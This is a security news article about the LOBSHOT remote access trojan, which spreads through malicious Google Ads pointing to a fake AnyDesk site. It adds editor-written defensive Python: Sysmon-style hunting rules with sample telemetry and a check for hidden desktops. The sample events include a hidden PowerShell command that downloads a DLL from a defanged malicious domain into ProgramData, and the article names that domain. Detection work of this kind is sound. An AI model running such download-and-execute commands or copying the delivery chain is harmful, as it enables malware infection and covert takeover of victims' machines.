A new malware strain called LOBSHOT, distributed through Google Ads, lets threat actors covertly take control of compromised Windows PCs over hVNC. Earlier this year, many security researchers noted an abrupt rise in threat actors using Google ads to spread malware through search results. The malicious ads impersonated the websites of popular programs, including 7-Zip, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus, and many more.
Instead of serving the genuine software, these sites pushed malware, including Gozi, RedLine, Vidar, Cobalt Strike, SectopRAT, and Royal ransomware. In a recent report, Elastic Security Labs found that a new remote access trojan, LOBSHOT, was being distributed the same way: the ads promoted the legitimate AnyDesk remote management program but pointed to a fake AnyDesk site at amydeecke[.]website.
That site served a malicious MSI file which ran a PowerShell command to download a DLL from download-cdn[.]com, a domain previously linked to the TA505/Clop ransomware group. Whether TA505 still uses the domain is unknown; Proofpoint threat analyst Tommy Madjar has previously noted that it changed hands. The downloaded DLL is the LOBSHOT malware itself. It is saved to the C:\ProgramData folder and executed with RunDLL32.exe.
“We have observed over 500 unique LOBSHOT samples since last July. The samples we have observed are compiled as 32-bit DLLs or 32-bit executables typically ranging around 93 KB to 124 KB,” the Elastic Security Labs report explains.
Once executed, the malware checks whether Microsoft Defender is running and, if it is, terminates itself to avoid detection. If Defender is not found, it creates Registry entries so that it launches automatically when the user logs in to Windows, and it transmits system information from the infected computer, including the list of running processes. The malware also looks for 32 cryptocurrency wallet extensions in Chrome, nine in Edge, and 11 in Firefox.
After listing the extensions, the malware executes a file from C:\ProgramData. Elastic could not determine whether this file is used to steal the extension data or serves some other purpose, because it was not recovered during their research. Stealing cryptocurrency wallet extensions is common malware behaviour, but Elastic also found that LOBSHOT contains an hVNC module that lets threat actors covertly access an infected device remotely.
hVNC, or hidden virtual network computing, is a modified version of the VNC remote access software that lets an operator work on a hidden desktop on the infected computer instead of the owner's visible desktop. A threat actor can therefore take remote control of a Windows machine without the victim noticing anything on screen. According to Elastic, LOBSHOT deploys an hVNC module that lets threat actors drive the concealed desktop with their own keyboard and mouse as if they were sitting in front of it.
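The delivery chain (MSI spawning PowerShell, PowerShell fetching a DLL into C:\ProgramData, RunDLL32 loading it) and the Registry autostart described above are all visible in ordinary endpoint telemetry. The following hunting rules are an added example, written by the editor and not taken from Elastic's report or from the malware; they run over constructed events shaped like Sysmon EventID 1 (process creation) and EventID 13 (registry value set) that have already been parsed into dicts. The field names follow Sysmon's; the file name `update.dll`, the Run value name, the SID and the PowerShell arguments are invented for illustration, and the assumption that the autostart entry is a Run key is the editor's, since the article only says "Registry entries".

```python
"""Hunting rules for the LOBSHOT delivery chain (editor's example, not Elastic's code)."""
from __future__ import annotations
import ntpath
import re

# A Run/RunOnce key in any hive (Sysmon logs HKU\<SID>\... for per-user keys).
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
# A DLL path anywhere under C:\ProgramData (drive letter left open).
PROGRAMDATA_DLL_RE = re.compile(r"[A-Z]:\\ProgramData\\[^\s\"']*\.dll", re.I)


def basename(path: str) -> str:
    """Case-folded file name of a Windows path, '' if the field is missing."""
    return ntpath.basename(path).lower()


def check_process(ev: dict) -> list[str]:
    """Rules for a process-creation event; returns the names of the rules that fired."""
    hits: list[str] = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    # Stage 1: an MSI installer for a remote-desktop client has no reason to spawn PowerShell.
    if image == "powershell.exe" and parent == "msiexec.exe":
        hits.append("msiexec_spawns_powershell")
    # Stage 2: rundll32 loading a DLL that was dropped into C:\ProgramData.
    if image == "rundll32.exe" and PROGRAMDATA_DLL_RE.search(cmd):
        hits.append("rundll32_programdata_dll")
        if parent == "powershell.exe":
            hits.append("rundll32_spawned_by_powershell")
    return hits


def check_registry(ev: dict) -> list[str]:
    """Rules for a registry value-set event: a Run key pointing rundll32 at a ProgramData DLL."""
    target = ev.get("TargetObject", "")
    details = ev.get("Details", "")
    if (RUN_KEY_RE.search(target)
            and "rundll32" in details.lower()
            and PROGRAMDATA_DLL_RE.search(details)):
        return ["run_key_rundll32_programdata"]
    return []


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run every event through the rule for its type; returns (RecordId, rule) pairs."""
    findings: list[tuple[int, str]] = []
    for ev in events:
        if ev.get("EventID") == 1:
            hits = check_process(ev)
        elif ev.get("EventID") == 13:
            hits = check_registry(ev)
        else:
            hits = []
        findings.extend((ev["RecordId"], h) for h in hits)
    return findings


# Constructed sample telemetry: records 1, 2 and 4 are the infection chain, 3 and 5 are benign.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"powershell.exe -w hidden -c iwr https://download-cdn[.]com/x -o C:\ProgramData\update.dll"},
    {"RecordId": 2, "EventID": 1,
     # 32-bit DLL, so the WOW64 rundll32 is the one that loads it.
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"rundll32.exe C:\ProgramData\update.dll,Entry"},
    {"RecordId": 3, "EventID": 1,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"RecordId": 4, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\ProgramDataUpdate",
     "Details": r"rundll32.exe C:\ProgramData\update.dll,Entry"},
    {"RecordId": 5, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe /background"},
]

if __name__ == "__main__":
    for record_id, rule in scan(SAMPLE_EVENTS):
        print(f"record {record_id}: {rule}")
```

The rules are deliberately narrow (ProgramData plus rundll32 plus a PowerShell or msiexec parent) so they stay quiet on the legitimate rundll32 and Run-key activity in records 3 and 5; on a real estate you would tune `PROGRAMDATA_DLL_RE` to exclude vendor subfolders that genuinely ship DLLs there. Note that a Defender-enabled host never gets this far, since the sample exits when it sees Defender running, so absence of these hits says nothing about whether the MSI was opened.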
“At this stage, the victim machine will start sending screen captures that represent the hidden desktop that is sent to a listening client controlled by the attacker,” explains Elastic. “The attacker interacts with the client by controlling the keyboard, clicking buttons, and moving the mouse, these capabilities provide the attacker full remote control of the device.”
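Because the hidden desktop is a real Windows desktop object, a responder on the suspect machine can simply ask the window station what desktops exist. The check below is an added example by the editor, not Elastic's tooling or part of LOBSHOT; it calls the Win32 `EnumDesktopsW` API through ctypes and flags any desktop whose name is not one of the ones Windows itself creates in the interactive window station. The assumption, which holds for hVNC implementations generally but is not stated in the article for LOBSHOT specifically, is that the module creates its hidden desktop with `CreateDesktop` in the same window station as the user's session, so that it can be drawn to and captured; the list of expected names is the editor's and may need extending on hosts with third-party secure-desktop tools.

```python
"""Look for extra desktops in the interactive window station (editor's example, not from the article)."""
import sys
from typing import Iterable

# Desktops Windows itself creates in WinSta0: the user's desktop, the secure
# logon/UAC desktop, the one shown while a session is disconnected, and the
# transient screensaver desktop. Anything else deserves a look. (Editor's list.)
KNOWN_DESKTOPS = {"default", "winlogon", "disconnect", "screen-saver"}


def suspicious_desktops(names: Iterable[str]) -> list[str]:
    """Names that are not in the known set, de-duplicated and sorted; case-insensitive."""
    return sorted({n for n in names if n.lower() not in KNOWN_DESKTOPS})


def enumerate_desktops() -> list[str]:
    """Return the desktop names in the calling process's window station (Windows only)."""
    if sys.platform != "win32":
        raise OSError("desktop enumeration needs the Win32 user32 API")
    import ctypes
    from ctypes import wintypes

    user32 = ctypes.WinDLL("user32", use_last_error=True)
    # BOOL CALLBACK EnumDesktopProc(LPWSTR lpszDesktop, LPARAM lParam)
    ENUMPROC = ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.LPWSTR, wintypes.LPARAM)
    user32.GetProcessWindowStation.restype = wintypes.HWINSTA
    user32.EnumDesktopsW.argtypes = (wintypes.HWINSTA, ENUMPROC, wintypes.LPARAM)
    user32.EnumDesktopsW.restype = wintypes.BOOL

    found: list[str] = []

    def collect(name, _lparam):
        found.append(name)
        return True  # keep enumerating

    # Requires DESKTOP_ENUMERATE on the window station, which the interactive user has.
    if not user32.EnumDesktopsW(user32.GetProcessWindowStation(), ENUMPROC(collect), 0):
        raise ctypes.WinError(ctypes.get_last_error())
    return found


if __name__ == "__main__":
    desktops = enumerate_desktops()
    print("desktops:", desktops)
    extra = suspicious_desktops(desktops)
    print("unexpected:", extra or "none")
```

Run it from the logged-on user's session, since desktops live in that session's WinSta0; a service or a remote shell in session 0 sees a different window station and will report nothing useful. A hit is a lead, not a verdict: an attacker can name the hidden desktop anything, including something that looks like a Windows name, so confirm by inspecting the process that owns the desktop and its network connections.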
With hVNC the threat actors have full control of the device: they can run commands, steal data, and install additional malware payloads. Because AnyDesk is widely used in business environments, the malware is likely intended to gain initial access to corporate networks and then move laterally to other devices. That access can lead to data extortion, ransomware attacks, and other follow-on attacks.